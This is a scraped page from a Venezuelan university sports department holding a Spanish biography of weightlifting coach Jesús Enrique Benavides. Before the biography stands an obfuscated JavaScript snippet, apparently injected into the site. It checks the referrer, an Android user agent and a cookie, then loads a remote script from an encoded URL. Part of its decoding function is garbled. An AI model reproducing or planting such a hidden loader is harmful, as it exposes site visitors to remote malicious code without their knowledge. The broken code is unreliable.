;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Jesús Enrique Benavides - Dirección de Deportes
Universidad del Zulia
Correo LUZMapa del sitio
24 de octubre de 2018
 
Programas
Alto Rendimiento Educ.Fisica y Recreación Deporte Interno Extensión Deportiva Actividad Física Recreación Atención al Atleta Entrenamientos Registro Atleta LUZ Pequeña Liga de Béisbol
Juegos Deportivos
Condiciones Generales
Afiches deportivos
Posición Final 2010
Posición Final 2011
Planilla de inscripción
Más Deporte
Juvines 2010
Juvines 2012
Juvineu 2015

images/stories/topes/sucesion.jpg

Agrandar texto   Reducir texto   Reestablecer texto    
Jesús Enrique Benavides PDF Imprimir Correo

Entrenador de Levantamiento de Pesas
Universidad del Zulia

1977-1997


Su calidad como deportista y ser humano, se vieron siempre reflejados en su brillante carrera; Jesús Enrique Benavides, fue, es y será por siempre una presea invaluable, un tesoro de la Halterofilia universitaria.

Nacido en Maracaibo, 4 de Octubre de 1941, formó parte de una generación de atletas múltiples, incursionó en las disciplinas de levantamiento  de pesas, lucha olímpica, atletismo, softbol y gimnasia artística; además representó al país en competencias internacionales en la categoría máster.

Desde muy niño construía sus propias pesas para entrenar, a la edad de 15 años se convierte en asiduo visitante de los entrenamientos de la disciplina en el Instituto Nacional de Deportes, ubicado en la avenida Cecilio Acosta con Bella Vista.

Su debut competitivo en la halterofilia, fue en el Campeonato Nacional celebrado en el estado Anzoátegui en el año 1957 y con sólo 16 años alcanza  la medalla  de bronce en la categoría novatos;  a partir de ese momento comienza su derroche de condiciones físicas bajo las instrucciones y apoyo de Glauco Maldonado. En 1958, compite por el estado Mérida y logra el subcampeonato.

Inmediatamente, después  de su estreno en competencias deportivas nacionales, se constituye en atleta de la Selección Nacional, representando el país por espacio de 20 años, siendo su primer compromiso internacional en 1964, cuando viaja a Colombia y conquista su primera medalla de bronce en el Campeonato Panamericano.

Asimismo, asiste a los Juegos Nacionales celebrados en Maracaibo, Maracay y Caracas, respectivamente. Entre sus variados logros destacan: cuatros veces Campeón Nacional; Subcampeón  en los Juegos Bolivarianos de 1970 al alzar 150 Kg en envión, 135 Kg en fuerza y 102 Kg en arranque; medalla de bronce en los Juegos Deportivos Nacionales de 2º Ciudades, celebrados en Puerto Rico y Campeón Panamericano Máster en el año 2001.

La pasión de este deportista zuliano, se prodigó también hacía la Lucha Olímpica, donde se convirtió en Campeón Occidental; por su parte, en el softbol estudiantil llegó a conectar cuatro cuadrangulares en un mismo partido, mientras que en el atletismo ostenta el Record Nacional en lanzamiento de disco y martillo en la categoría máster (65-69 años), sin contar lo obtenido como corredor de 100 y 200 metros planos.

También incursionó en gimnasia artística, convirtiéndose en poco tiempo en el primer entrenador y juez zuliano en esta disciplina y logrando en su primera presentación el titulo en los Juegos Nacionales celebrados en el año 1970.

LUZ en 20 años.

Ingresa como personal de entrenadores de la Universidad del Zulia en noviembre de 1977, siendo el Director de Deportes el Dr. Gustavo Baptista y ese mismo año tiene la oportunidad de asistir a la 1º Copa de México 1977 en la que logra titularse Subcampeón; posteriormente, estructura el primer equipo que asiste a unos Juegos Venezolanos de Instituciones de Educación Superior, Juvines, y donde la cadena de triunfos se extendió por espacio de 13 años consecutivos, como Campeón Nacional Universitario y los siete años subsiguientes la Universidad del Zulia, figuró entre los primeros lugares de las  tablas generales de competencias.

A la par de su trayectoria deportiva, logró una destacada actuación académica. Egresó de la Universidad Pedagógica Politécnica El Libertador, donde obtuvo la licenciatura en Educación Integral mención Educación Física; en el año 1990 cursa la especialidad de Deporte en el Instituto Panamericano de Educación Física (Ipef). Se desempeñó como docente  de Educación Física en diferentes instituciones de la región. También destacó en el dictado de cursos a nivel de posgrado en la Universidad de los Andes en las áreas de Sistemas de Entrenamientos. Además de impartir los cursos de Control de Medición y Biomecánica del Entrenamiento.

Entre los años 1998-2000, se desempeñó como Director Operativo de Alto Rendimiento en el Instituto Regional de Deportes del estado Zulia (Irdez)

En la actualidad el reconocido Benavides disfruta de su jubilación al lado de su esposa Alexandra; sus hijos y nietos;  recibiendo en febrero de 2009 el reconocimiento de la comunidad deportiva de la Universidad del Zulia al distinguir con su nombre la Sala de Acondicionamiento Físico para Atletas de Alto Rendimiento de LUZ.

Sala de Acondicionamiento Físico para Atletas de Alto Rendimiento de LUZ
Ubicación: . Núcleo Humanístico entre la Facultad de Ciencias Económicas y Sociales y el campo de Fútbol “Br Julio García”.

Redacción: Yasmira Meleán Marin
Fotografía: Claudio Ocando




^ Subir